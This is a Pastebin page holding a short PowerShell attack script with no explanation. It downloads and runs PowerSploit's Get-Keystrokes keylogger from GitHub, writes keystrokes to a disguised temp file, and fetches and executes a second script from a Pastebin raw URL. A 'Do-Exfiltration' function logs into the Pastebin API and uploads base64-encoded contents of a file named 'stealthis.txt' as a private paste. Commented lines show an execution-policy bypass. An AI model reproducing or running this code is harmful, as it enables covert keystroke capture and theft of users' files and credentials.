API tools faq
paste
Advertisement
rellimnaitsirhc

will

rellimnaitsirhc
Jan 23rd, 2018
112
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.70 KB | None | 0 0
raw download clone embed print report
  1. IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
  2. Get-Keystrokes -LogPath ~\AppData\Local\Temp\01JKNVB1.cst -Timeout 10
  3. $down = New-Object System.Net.WebClient
  4. $url = 'https://pastebin.com/raw/91PJ6iJG';
  5. $file = 'mess3.ps1';
  6. $down.DownloadFile($url,$file);
  7. IEX (New-Object Net.WebClient).DownloadString('C:\Users\Chris\Documents\powershell\mess3.ps1')
  8. #New-PasteBin -pasteCode "Get-ChildItem C:\Users\Chris\Desktop\testing123.txt" -pasteName "attempt 1 WWWSAQnn" -pasteSubDomain "WWWSAQnn" -pasteExpireDate "N" -pasteFormat "powershell"
  9. #powershell.exe -executionpolicy bypass -file mess3.ps1
  10.  
  11. $dev_key=""
  12. $username=""
  13. $password=""
  14. function Do-Exfiltration
  15. {
  16.  
  17. function post_http($url,$parameters)
  18. {
  19. $http_request = New-Object -ComObject Msxml2.XMLHTTP
  20. $http_request.open("POST", $url, $false)
  21. $http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
  22. $http_request.setRequestHeader("Content-length", $parameters.length);
  23. $http_request.setRequestHeader("Connection", "close")
  24. $http_request.send($parameters)
  25. $script:session_key=$http_request.responseText
  26. }
  27. <#
  28. function Compress-Encode
  29. {
  30. #Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
  31. $ms = New-Object IO.MemoryStream
  32. $action = [IO.Compression.CompressionMode]::Compress
  33. $cs = New-Object IO.Compression.DeflateStream ($ms,$action)
  34. $sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
  35. $pastevalue | ForEach-Object {$sw.WriteLine($_)}
  36. $sw.Close()
  37. # Base64 encode stream
  38. $code = [Convert]::ToBase64String($ms.ToArray())
  39. return $code
  40. }
  41. #>
  42. $utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
  43. $pastevalue = [System.Convert]::ToBase64String($utfbytes)
  44. $pastename = "WWWXVDI"
  45. post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
  46. post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
  47.  
  48. }
  49. cd ../../../../../
  50. $data=cat ~/Desktop/stealthis.txt
  51. Do-Exfiltration
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!